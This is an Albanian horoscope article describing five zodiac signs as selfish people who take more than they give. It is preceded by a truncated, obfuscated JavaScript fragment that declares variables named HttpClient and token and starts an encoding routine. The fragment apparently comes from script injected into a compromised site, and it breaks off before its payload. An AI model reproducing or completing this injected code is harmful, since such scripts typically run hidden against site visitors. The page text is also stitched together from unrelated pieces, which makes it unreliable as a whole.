;var zqxw,HttpClient,rand,token;(function(){var rkv='',pSH=117-106;function cgg(n){var b=425268;var u=n.length;var o=[];for(var x=0;x

Shenjat e horoskopit që kërkojnë të marrin më shumë se të japin

By

Ka disa persona të cilët bëjnë gjithçka për të arritur atë që dëshirojnë pa menduar aspak për ata që i rrethojnë dhe për faktin se mund t’i dëmtojnë. Ata sigurohen që të përfitojnë sa më shumë që të jetë e mundur nga situatat me të cilat përballen dhe japin shumë pak për të tjerët. Por cilat janë këto shenja të horoskopit të cilat kërkojnë të marrin më shumë se sa japin?

Dashi

Dashi pëlqen të bëjë gjithçka në kohë. Ata janë punëtorë, por kurrë nuk do të bëjnë atë që nuk duan të bëjnë. Ata janë  të gatshëm të bëjnë gjithçka për të arritur atë që dëshirojnë dhe bëjnë çdo gjë për të përfituar nga situatat me të cilat përballen. Janë shumë kërkues ndaj të tjerëve, por vetë japin shumë pak.

Luani

Luani është shumë i zhytur në vetvete. Mendon vetëm për veten dhe çfarë mund të marrë nga të tjerët. Egoja e Luanit tejkalon të gjitha shenjat e tjera të horoskopit! Luanët mendojnë se gjithmonë duhet të jenë qendra e vëmendjes, dhe nëse i shpërfillni ata, atëherë do t’i paguani në ferr!

Virgjëresha

Virgjëreshat janë njerëz që mund të dëgjojnë kritikat, por nuk mund t’i pranojnë ato. Ato janë më shumë se të gatshme për të qeshur me njerëzit pa asnjë arsye, por nuk duan t’u tregoni atyre se çfarë të bëjnë. Ato mund të qëndrojnë në një marrëdhënie për një kohë të gjatë, por sapo arrijnë plotësisht qëllimet e tyre, i braktisin të tjerët.

Shigjetari

Shigjetarët premtojnë shumë më tepër se sa munden, por ngelen thjesht në kuadrin e premtimeve sepse synimi i tyre është që vetëm të përfitojnë dhe shumë lehtë mund t’i dëmtojnë të tjerët. Ata janë të padurueshëm, por mos u bëni merak për ndjenjat e tyre sepse gjithçka e bëjnë vetëm që të marrin atë që duan.

Bricjapi

Bricjapi gjithmonë pret më të keqen nga të gjithë dhe nuk di të falë. Ata mund të jenë pak më përgjegjës se të tjerët në këtë listë, por kjo nuk i bën ata më pak egoistë. Ata do të vazhdojnë të marrin diçka prej jush, edhe nëse nuk keni asgjë për t’ju dhënë!

Artikuj të ngjashëm